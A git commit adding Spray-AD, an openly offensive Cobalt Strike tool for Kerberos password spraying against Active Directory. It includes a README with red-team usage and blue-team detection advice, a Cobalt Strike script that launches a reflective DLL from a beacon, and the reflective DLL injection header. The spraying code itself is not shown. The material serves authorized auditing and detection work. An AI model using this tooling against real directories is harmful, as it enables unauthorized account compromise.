First Commit

README.md

@@ -1,2 +1,31 @@
-# Spray-AD
- A tool to audit Active Directory for user accounts with easy guessable passwords.
+# Spray-AD, a Cobalt Strike tool to perform a fast Kerberos password spraying attack against Active Directory.
+This tool can help Red and Blue teams to audit Active Directory useraccounts for weak, well known or easy guessable passwords.
+
+## Usage:
+
+```
+Download the Spray-AD folder and load the Spray-AD.cna script within the Cobalt Strike Script Manager.
+Syntax within beacon context: Spray-AD [password to test]
+```
+
+```
+This project is written in C/C++
+You can use Visual Studio to compile the reflective dll's from source.
+```
+
+## Note to Red:
+Make sure you always check the Active Directory password and lockout policies before spraying to avoid lockouts.
+
+## Note to Blue:
+To detect Active Directory Password Spraying, make sure to setup centralized logging and alarming within your IT environment and enable (at least) the following Advanced Audit policy on your Domain Controllers: 
+
+```
+Audit Kerberos Authentication Service (Success & Failure). 
+This policy will generate Windows Security Log Event ID 4771 (Kerberos pre-authentication failed),
+```
+
+More info can be found in the following post by Sean Metcalf:
+https://www.trimarcsecurity.com/post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing
+
+## Credits
+Author: Cornelis de Plaa (@Cneelis) / Outflank

Spray-AD/Spray-AD.cna

@@ -0,0 +1,26 @@
+#Spray-AD
+#author Cornelis de Plaa
+#@outflank.nl
+
+#register help
+beacon_command_register("Spray-AD", "Perform a Kerberos password spraying attack against Active Directory.",
+	"Test all enabled Active Directory useraccounts for valid passwords.\n\n" .
+	"Synopsis: Spray-AD [password]\n\n");
+
+alias Spray-AD {
+	$bid = $1;
+
+	$input = substr($0, 9);
+	@args = split(' ', $input);
+
+	$object = @args[0];
+
+    if ($object eq "") {
+		berror($bid, "Please specify a password to test.");
+		return;
+	}
+    else{
+        blog($bid, "Let's start spraying useraccounts with password: " . $object . "\n");
+        bdllspawn($bid, script_resource("Spray-AD.dll"), $object, "Spray-AD", 5000, false);
+	}
+}

Src/Spray-AD/Spray-AD.sln

@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 14 for Windows Desktop
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Spray-AD", "Spray-AD\Spray-AD.vcxproj", "{D30C9D6B-1F45-47BD-825B-389FE8CC9069}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x64.ActiveCfg = Debug|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x64.Build.0 = Debug|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x86.ActiveCfg = Debug|Win32
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x86.Build.0 = Debug|Win32
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x64.ActiveCfg = Release|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x64.Build.0 = Release|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x86.ActiveCfg = Release|Win32
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

Src/Spray-AD/Spray-AD/ReflectiveDLLInjection.h

@@ -0,0 +1,52 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+
+// we declare some common stuff in here...
+
+#define DLL_QUERY_HMODULE		6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID);
+typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
+
+#define DLLEXPORT   __declspec( dllexport ) 
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
+